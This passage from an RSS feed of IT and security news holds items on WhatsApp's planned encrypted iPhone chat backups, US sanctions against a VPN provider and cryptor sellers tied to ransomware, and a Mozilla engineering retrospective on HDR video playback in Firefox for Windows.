<content:encoded><![CDATA[The popular messaging platform WhatsApp is working on a first-party backup solution for iPhone users. This upcoming change means you will eventually have a choice in how you store your chat history. Instead of relying entirely on Apple for storage, you can keep your message logs and media files directly on the chat app's own servers. This shift follows similar tests for Android users earlier this year.



Expect two gigabytes of free storage and default chat encryption



The latest beta version reveals that the company plans to offer 2GB of free space right out of the gate. If your chat history is larger than that, it is working on paid tiers. You might see a 50GB plan for about a dollar a month, which matches what Apple charges for its entry-level upgrade. A massive 1TB option is also in development for heavy users.



Security is a major focus here. Backups stored on the new servers will feature end-to-end encryption by default. This is a step up from the current system, where you have to manually turn on advanced data protection to encrypt your files.



The app recommends using a passkey for this, but a standard password or a 64-digit key will work just fine. Neither the messaging company nor its parent company can read your saved chats.



Switching saves your primary storage for photos and daily apps



Right now, chat backups eat into your limited free space on iCloud. Media-heavy chats take up a lot of room quickly. By moving these backups to a dedicated server, you instantly reclaim space for your photos, documents, and other daily essentials.







You do not have to make the switch if you prefer the old method. The current system remains the default choice. If you decide to change over, you can delete your old backup from your phone settings to free up gigabytes of space immediately. Along with other recent interface tweaks like the green dot showing when contacts are online, this feature reveals the company is steadily expanding how you manage your data and presence.



This backup alternative is still in beta testing and not yet ready for public release. The developer has not provided a specific launch date. However, giving users direct control over where their data lives is a practical move that solves a real storage problem. We will keep an eye out for when this rolls out to all users in a future app update.]]></content:encoded>
</item>
<item>
<title><![CDATA[US sanktioniert VPN-Anbieter und Cryptor-Verkäufer wegen Ransomware-Unterstützung]]></title>
<description><![CDATA[WASHINGTON / LONDON (IT BOLTWISE) – Das US-Finanzministerium (OFAC) sanktioniert einen VPN-Anbieter sowie Personen, die Cryptor-Tools verkaufen und Ransomware-Aktivitäten absichern. Gleichzeitig ordnen Ermittler die Taktik dahinter ein: Infrastruktur zum Verbergen von Angriffsorten, zum Ausweiche...]]></description>
<link>https://tsecurity.de/de/3667910/it-security-nachrichten/us-sanktioniert-vpn-anbieter-und-cryptor-verkaeufer-wegen-ransomware-unterstuetzung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667910/it-security-nachrichten/us-sanktioniert-vpn-anbieter-und-cryptor-verkaeufer-wegen-ransomware-unterstuetzung/</guid>
<pubDate>Tue, 14 Jul 2026 14:25:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ransomware-vpn-sanctions-snmp.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ransomware-vpn-sanctions-snmp.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ransomware-vpn-sanctions-snmp-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ransomware-vpn-sanctions-snmp-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ransomware-vpn-sanctions-snmp-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ransomware-vpn-sanctions-snmp-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ransomware-vpn-sanctions-snmp-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">WASHINGTON / LONDON (IT BOLTWISE) – Das US-Finanzministerium (OFAC) sanktioniert einen VPN-Anbieter sowie Personen, die Cryptor-Tools verkaufen und Ransomware-Aktivitäten absichern. Gleichzeitig ordnen Ermittler die Taktik dahinter ein: Infrastruktur zum Verbergen von Angriffsorten, zum Ausweichen vor Sicherheitskontrollen und zur systematischen Verbreitung von Schadsoftware. Parallel dazu warnen FBI und CISA vor russischen Akteuren, die über schlecht konfigurierte […]</p>
<div><a href="https://www.it-boltwise.de/us-sanktioniert-vpn-anbieter-und-cryptor-verkaeufer-wegen-ransomware-unterstuetzung.html">... den vollständigen Artikel <strong>»US sanktioniert VPN-Anbieter und Cryptor-Verkäufer wegen Ransomware-Unterstützung«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/us-sanktioniert-vpn-anbieter-und-cryptor-verkaeufer-wegen-ransomware-unterstuetzung.html">US sanktioniert VPN-Anbieter und Cryptor-Verkäufer wegen Ransomware-Unterstützung</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quantum Security: ARGOS schützt militärische Daten - CPM Defence Network]]></title>
<description><![CDATA[Parallel entstehen auf demselben technologischen Kern weitere vertikale Lösungen: für Cybersicherheit und kritische Infrastruktur, für ...]]></description>
<link>https://tsecurity.de/de/3667232/it-security-nachrichten/quantum-security-argos-schuetzt-militaerische-daten-cpm-defence-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667232/it-security-nachrichten/quantum-security-argos-schuetzt-militaerische-daten-cpm-defence-network/</guid>
<pubDate>Tue, 14 Jul 2026 09:52:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Parallel entstehen auf demselben technologischen Kern weitere vertikale Lösungen: für Cybersicherheit und kritische Infrastruktur, für ...]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp arbeitet an eigener Backup-Lösung für iOS]]></title>
<description><![CDATA[Wer seine WhatsApp-Chats, Bilder und Videos als Backup speichern möchte, kann das Abbild bislang nur in der iCloud ablegen. Doch WhatsApp arbeitet jetzt an einer Alternative, denn der Messenger will eine eigene Backup-Lösung anbieten, die Ende-zu-Ende verschlüsselt ist. Zuerst hatte WABetaInfo be...]]></description>
<link>https://tsecurity.de/de/3666983/ios-mac-os/whatsapp-arbeitet-an-eigener-backup-loesung-fuer-ios/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666983/ios-mac-os/whatsapp-arbeitet-an-eigener-backup-loesung-fuer-ios/</guid>
<pubDate>Tue, 14 Jul 2026 08:12:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Wer seine WhatsApp-Chats, Bilder und Videos als Backup speichern möchte, kann das Abbild bislang nur in der iCloud ablegen. Doch WhatsApp arbeitet jetzt an einer Alternative, denn der Messenger will eine eigene Backup-Lösung anbieten, die Ende-zu-Ende verschlüsselt ist. Zuerst hatte WABetaInfo berichtet, dass WhatsApp die Funktion für Android testet, um unabhängig von Google Drive zu […]</p>
<p>Der Beitrag <a href="https://www.appgefahren.de/whatsapp-arbeitet-an-eigener-backup-loesung-fuer-ios-402246.html">WhatsApp arbeitet an eigener Backup-Lösung für iOS</a> erschien zuerst auf <a href="https://www.appgefahren.de/">appgefahren.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla GFX: HDR video in Firefox for Windows tech retrospective]]></title>
<description><![CDATA[HDR video is coming to Firefox for Windows users (and has been available for some time on macOS).  This blog post explains how we developed the feature and gives a retrospective on the technical choices we made.



A primer on video playback for the web:




Video file demux and decode: A video s...]]></description>
<link>https://tsecurity.de/de/3666879/tools/mozilla-gfx-hdr-video-in-firefox-for-windows-tech-retrospective/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666879/tools/mozilla-gfx-hdr-video-in-firefox-for-windows-tech-retrospective/</guid>
<pubDate>Tue, 14 Jul 2026 07:08:30 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="wp-block-paragraph">HDR video is coming to Firefox for Windows users (and has been available for some time on macOS).  This blog post explains how we developed the feature and gives a retrospective on the technical choices we made.</p>



<p class="wp-block-paragraph">A primer on video playback for the web:</p>



<ul class="wp-block-list">
<li><strong>Video file demux and decode</strong>: A video stream generally consists of parallel image and audio streams, along with captions, HDR scene metadata, and the like. “Container” formats like MP4 or MKV specify how these streams are combined, or multiplexed, into a single byte stream for transmission. On receipt, Firefox needs to divide that byte stream back into the individual media streams; this is de-multiplexing or “demuxing”. Then Firefox must uncompress the data to get images, audio samples, and so on. Firefox’s media team provides the demuxers, and pulls in appropriate codecs to decode them. We prefer using hardware video decoders if they work reasonably well. Video decompression usually produces roughly a YUV 4:2:0 image in <a href="https://learn.microsoft.com/en-us/windows/win32/medfound/recommended-8-bit-yuv-formats-for-video-rendering">NV12 for SDR</a> or <a href="https://learn.microsoft.com/en-us/windows/win32/medfound/10-bit-and-16-bit-yuv-video-formats">P010 for HDR</a>. (If you visit <strong>about:support</strong> in Firefox, and search for <strong>Codec Support Information</strong> (or one of the codec names like <strong>AV1</strong>), you can see a whole feature matrix of support details for which codecs are hardware and software on your system.)</li>



<li><strong>Gecko displaylist building</strong>: Given a demultiplexed, uncompressed frame of video, Gecko displaylist building incorporates it into a video element in the displaylist being sent to WebRender. If the frame was decoded in hardware, it is generally represented by a texture in GPU memory. Or, if it was decoded in software, then it is represented by a memory mapping holding some raw pixel data in system memory shared with Firefox’s media decoder process.</li>



<li><strong>WebRender</strong>: Given the video element in the displaylist, WebRender decides whether to promote it to a desktop compositor overlay, or whether it must instead be rendered using a pathway more like an ordinary HTML element. A compositor overlay is faster and uses less power; on Windows this uses DWM with the <a href="https://learn.microsoft.com/en-us/windows/win32/api/_directcomp/">DirectComposition API</a>, which manages a graph of <a href="https://learn.microsoft.com/en-us/windows/win32/api/dcomp/nn-dcomp-idcompositionvisual">visuals</a>. But if complex CSS is involved (rounded corners, blur filters, or similar features), Firefox must use WebRender’s ordinary rendering pathway. Currently the latter is not HDR capable, so Firefox favors the desktop compositor overlay for animated elements such as video and canvas.</li>
</ul>



<p class="wp-block-paragraph">As we began designing Firefox’s HDR support, we had to lay out some assumptions and found many complications:</p>



<ul class="wp-block-list">
<li>Initially, we had hoped that on a modern system, <a href="https://en.wikipedia.org/wiki/Rec._2100">BT2100</a> HDR videos could be displayed on Windows by simply sending them to DirectComposition.
<ul class="wp-block-list">
<li>In theory, the Desktop Window Manager (DWM) honors the <a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgi1_4/nn-dxgi1_4-idxgiswapchain3">DXGISwapChain3</a>::<a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgi1_4/nf-dxgi1_4-idxgiswapchain3-setcolorspace1">SetColorSpace1</a> method which should let us request either <a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgicommon/ne-dxgicommon-dxgi_color_space_type">DXGI_COLOR_SPACE_YCBCR_STUDIO_G2084_LEFT_P2020</a> or <a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgicommon/ne-dxgicommon-dxgi_color_space_type">DXGI_COLOR_SPACE_YCBCR_STUDIO_GHLG_LEFT_P2020</a>. The former refers to SMPTE 2084, more commonly called PQ, the <a href="https://en.wikipedia.org/wiki/Perceptual_quantizer">Perceptual Quantizer</a> function and the latter is ARIB-STD-B67  also known as HLG, the <a href="https://en.wikipedia.org/wiki/Hybrid_log%E2%80%93gamma">Hybrid Log Gamma</a> function, most commonly used on HDR TV broadcasts.</li>



<li>Unfortunately, this was a dead end. In testing with a mocked up <a href="https://github.com/FirefoxGraphics/compositor_colortest/tree/main">compositor test app</a>, calling SetColorSpace1 with this value seems to be ignored on P010 (at least in testing on AMD), so it incorrectly displays BT2100 PQ video as if it were BT709, which makes the video dull and muddy, since BT709 is a narrower gamut than BT2020, and the BT1886 transfer function used by BT709 is very different from PQ defined by BT2100. SetColorSpace1 may work on other vendors with P010, so it may be a valid optimization, but we were looking for a universal solution.</li>



<li>For the future, Windows 11 23H2 has added a new interface called IDCompositionTexture which may serve our purposes better; from what we have been told, it is universally supported for all formats and color spaces. We haven’t used it for video so far, but it’s an interesting future direction.</li>
</ul>
</li>



<li>As noted above, HDR videos must use a desktop compositor overlay. HDR video uses the BT2100 PQ colorspace with an RGB10A2 format, while WebRender can only work with images in the sRGB colorspace (appropriate for standard-dynamic-range BT709 video).
<ul class="wp-block-list">
<li>Until HDR came along, Gecko and WebRender only used desktop compositor overlays as a power/performance optimization. With HDR, overlays become a necessity as the pixel format and color space differ from classic sRGB.</li>



<li>Fortunately, HDR videos tend to be shown without particularly fancy CSS rendering such as clip masks and rounded corners, which would require WebRender to perform further copies. Technically, DirectComposition does support all of those features, but Firefox doesn’t use that functionality much.</li>



<li>In the future, we expect to upgrade WebRender for HDR rendering, allowing us to deal with complex cases like clip masks or blur filters on video elements.</li>
</ul>
</li>



<li>We considered whether we could use VideoProcessorBlt, or whether we should write our own shader instead.
<ul class="wp-block-list">
<li>In favor of VideoProcessorBlt:
<ul class="wp-block-list">
<li>It uses less power on GPUs that have a video processor unit.</li>



<li>We discovered in testing (using <a href="https://learn.microsoft.com/en-us/windows/win32/api/d3d11_1/nf-d3d11_1-id3d11videoprocessorenumerator1-checkvideoprocessorformatconversion">CheckVideoProcessorFormatConversion</a>) that while many modern GPUs support one of the needed conversions (P010 PQ -&gt; RGB10 PQ), few support the ones we need for HLG videos (P010 HLG -&gt; RGB10 PQ).</li>



<li>The ‘video-dynamic-range’ query used on the web is not fine-grained enough to be able to say “the web browser can display PQ video but not HLG video”, so if we went with VideoProcessorBlt as a required feature, only about 20% of HDR desktop users would be able to use the feature.</li>



<li>In the future, we could explore using VideoProcessorBlit to save power on hardware that supports the conversions we need. But other web browsers are not using this functionality, so there may be more issues we haven’t found yet.</li>
</ul>
</li>



<li>In favor of writing our own shader with all of the features:
<ul class="wp-block-list">
<li>This would work consistently on all vendors – nothing special here.</li>



<li>This would look the same on all vendors, regardless of hardware capabilities. This is generally the aim of web standards.</li>



<li>This would support anything we want it to. HDR tonemapping can be implemented. Video orientation can be implemented (for videos recorded on phones which may be rotated 90, 180 or 270 degrees). We can support any kind of YUV-&gt;RGB conversion with a color matrix (even weird legacy formats like GBR 4:2:0).  We can support conversion between color primaries (e.g. BT2020-&gt;BT709).  We can convert to linear color (for scRGB using RGBA16F) or any EOTF we want (notably BT2100 PQ with RGB10A2, for our use-case).</li>
</ul>
</li>



<li>In the end we went with the shader after a significant period of time experimenting with VideoProcessorBlt in our Nightly releases.</li>
</ul>
</li>



<li>There is a very large amount of graphics code in Gecko and WebRender that needs to be upgraded for HDR.
<ul class="wp-block-list">
<li>We decided that the most important code paths to upgrade first are the ones for regular video playback and DRM-protected video playback, and later canvas video import (Canvas2D, WebGL, WebGPU) which will require upgrading canvas for HDR first – another big project.</li>



<li>We had to upgrade several dozen structs to carry the transfer function for video data, as previously all code assumed video used BT1886 EOTF.</li>
</ul>
</li>



<li>We hope we can avoid tone mapping HDR content when viewed on HDR displays.
<ul class="wp-block-list">
<li>It’s reasonable to expect that most displays going forward will be HDR displays (partly because of marketing momentum, partly because displays are made by a very finite set of manufacturers who are all making HDR display panels), and eventually tone mapping may become unnecessary on the web.</li>



<li>For the short-term we will have to apply a tone mapping effect when HDR content is viewed on SDR displays, likely using  ‘Reinhard tonemapping’ which refers to the widely available paper <a href="https://doi.org/10.1145/566654.566575">Photographic Tone Reproduction for Digital Images</a> by Erik Reinhard et al, and configuring it for a fixed brightness ratio of 400 cd/m^2 -&gt; 100 cd/m^2 when used on SDR displays, and see if that fits all HDR content on the web well enough for a good user experience – and if it does not, we will iterate based on feedback from users on Firefox Nightly.</li>



<li>We are hoping that we will never have to apply tonemapping for HDR content on HDR displays, there are multiple factors in this decision:
<ul class="wp-block-list">
<li>Varying the brightness limit would make it a significant fingerprinting vector if not handled very carefully if the script can inspect pixels or parameters related to that.  There are ways to mitigate this but they are all awkward restrictions to impose, and queries would have to get a different answer than what the rendering is using.</li>



<li>Phones and laptops with light sensors may vary the reference brightness in real time, and this changes the maximum displayable ratio (aka HDR headroom) every refresh, which is also a major battery drain if we keep redrawing all of the time.</li>



<li>Documents composed of multiple images (a gallery or some form of art composition) would apply different tonemapping to each image if the brightest pixel in each image is different brightness).  We’d have to do something about that to make it controllable via CSS.</li>



<li>In general the detailed parts of an image are within a certain brightness band – see <a href="https://www.yedlin.net/DebunkingHDR/">Debunking HDR</a> for a detailed lecture on film grading and why you would not have significant difference in brightness between scene elements.</li>



<li>User feedback so far has indicated that not applying tonemapping has given them a better viewing experience on some videos.</li>
</ul>
</li>
</ul>
</li>



<li>WebRTC is implemented using a library, common to all web browsers, which has limited support for HDR.
<ul class="wp-block-list">
<li>While we didn’t prioritize this for an initial feature launch, we are looking at how to implement HDR support properly in libwebrtc. This is in the early assessment phase but we know this is wanted for a couple of use-cases, like video calls for meetings, or game streaming with friends watching.</li>
</ul>
</li>
</ul>



<p class="wp-block-paragraph">In general, one of the biggest challenges in working on graphics code in a web browser is a lack of documentation for how to best use features like video playback and desktop compositing in the context of a web browser (e.g. multiple processes, sandboxing, shared memory, sharing external textures, etc). This parallels the rarity of graphics engineers with such experience. Building new features in this space requires a lot of research (and a lot of trial and error). The solution you end up with may not look at all like the one you initially imagined.</p>



<p class="wp-block-paragraph">On behalf of the graphics team at Mozilla, I want to thank the people who use Firefox Nightly regularly and file bug reports when things aren’t working the way they want. Comments on <a href="https://mozillagfx.wordpress.com/2026/01/16/experimental-high-dynamic-range-video-playback-on-windows-in-firefox-nightly-148/">Experimental High Dynamic Range video playback on Windows in Firefox Nightly 148</a>, <a href="https://connect.mozilla.org/">Mozilla Connect</a>, and <a href="https://bugzilla.mozilla.org/">Bugzilla</a> bug reports have guided us to focus on the use-cases that matter to people using Firefox. When we succeed, it’s a great feeling.</p>



<p class="wp-block-paragraph">We’re working on extending HDR support to photos, apps/games and general web content.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,67ms -->